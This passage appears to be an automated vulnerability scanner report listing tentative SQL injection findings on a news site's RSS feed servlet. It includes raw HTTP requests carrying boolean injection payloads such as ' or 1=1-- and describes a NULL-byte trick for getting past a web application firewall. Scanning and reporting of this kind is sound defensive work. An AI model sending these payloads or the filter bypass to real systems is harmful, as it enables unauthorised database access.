User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet18682428'%20or%201%3d2--%20/568/200911.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:13 GMT
Content-Length: 0
Connection: close


1.81. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200912.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200912.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 11169924'%20or%201%3d1--%20 and 11169924'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet11169924'%20or%201%3d1--%20/568/200912.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:22 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet11169924'%20or%201%3d2--%20/568/200912.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:22 GMT
Content-Length: 0
Connection: close


1.82. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200913.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200913.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568%00'/200913.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:21:53 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568%00''/200913.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:53 GMT
Content-Length: 0
Connection: close


1.83. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200914.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200914.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 64439849'%20or%201%3d1--%20 and 64439849'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56864439849'%20or%201%3d1--%20/200914.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56864439849'%20or%201%3d2--%20/200914.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:21:36 GMT
Content-Length: 0
Connection: close


1.84. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200915.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200915.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200915.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:22:18 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200915.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:19 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.85. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200916.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200916.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:37 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:18:37 GMT
Date: Tue, 07 Dec 2010 23:18:37 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.86. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200916.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200916.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:18:40 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200916.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:40 GMT
Content-Length: 0
Connection: close


1.87. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200917.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200917.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 43065906'%20or%201%3d1--%20 and 43065906'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi43065906'%20or%201%3d1--%20/rss/CustomRssServlet/568/200917.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:54 GMT
Date: Tue, 07 Dec 2010 23:21:54 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi43065906'%20or%201%3d2--%20/rss/CustomRssServlet/568/200917.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:55 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.88. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200918.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200918.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200918.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:22:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200918.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:22:10 GMT
Date: Tue, 07 Dec 2010 23:22:10 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.89. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200922.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200922.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16674106'%20or%201%3d1--%20 and 16674106'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi16674106'%20or%201%3d1--%20/rss/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:21:21 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi16674106'%20or%201%3d2--%20/rss/CustomRssServlet/568/200922.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:21:21 GMT
Date: Tue, 07 Dec 2010 23:21:21 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.90. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200922.xml [REST URL parameter 2]  previous  next

Summary

